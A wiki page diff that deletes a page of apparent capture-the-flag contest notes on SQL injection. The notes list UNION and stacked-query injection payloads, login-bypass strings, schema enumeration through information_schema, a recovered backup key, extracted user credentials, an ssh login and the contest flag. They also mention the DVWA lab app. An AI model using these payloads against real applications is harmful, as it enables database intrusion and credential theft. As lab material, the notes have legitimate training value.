Differences

This shows you the differences between two versions of the page.

--- contest:start [2016/10/20 21:39] – peter
+++ contest:start [2020/04/15 12:03] (current) – removed peter
@@ Line 1: / Line 1: @@
-==================================
-SQL INJECTION
-==================================
-select TABLE_NAME, TABLE_SCHEMA from information_schema.tables;
-select TABLE_NAME, COLUMN_NAME from information_schema.columns;
-select last_name, first_name from users union select 1,2;
-select last_name, first_name from users union select version(),user();
-select * from users union select 1,2,3,4,5,6;
-select * from dvla.users union select TABLE_NAME, COLUMN_NAME, 1,2,3,4 from information_schema.columns;
-select first_name, last_name from dvwa.users where user_id = 1;
-username = "test' or 1 -- "
-password = "test"
-email address = "some@one.com"
-username = "a' or 1 and id<>1; -- # "
-Order number = 4
-Name of first order = DDOSXXL
-db = dbm
-one table = bkeys
-Goto shop
-a'; select TABLE_NAME, TABLE_SCHEMA from information_schema.tables;
-a'; select TABLE_NAME, COLUMN_NAME from information_schema.columns;
-shows bkeys table has 2 columns - id and backup_key
-a'; select * from dbm.bkeys where id=1;
-shows backup_key = horsebatterystablecorrect
-a'; select 1, TABLE_NAME, TABLE_SCHEMA from information_schema.tables;
-shows db=cyber with one of its table = shop_users;
-a'; select TABLE_NAME, COLUMN_NAME from information_schema.columns;
-shows table shop_users with columns id, username, password, email, role
-a'; select * from cyber.shop_users;
-user = "ThisIsNotAFruit"
-password="b2n2n2"
-ssh admin@support.dbm.hl
-Killing this host...Great job.  The key is: YOUROCK
-==================================
-BOTNET
-==================================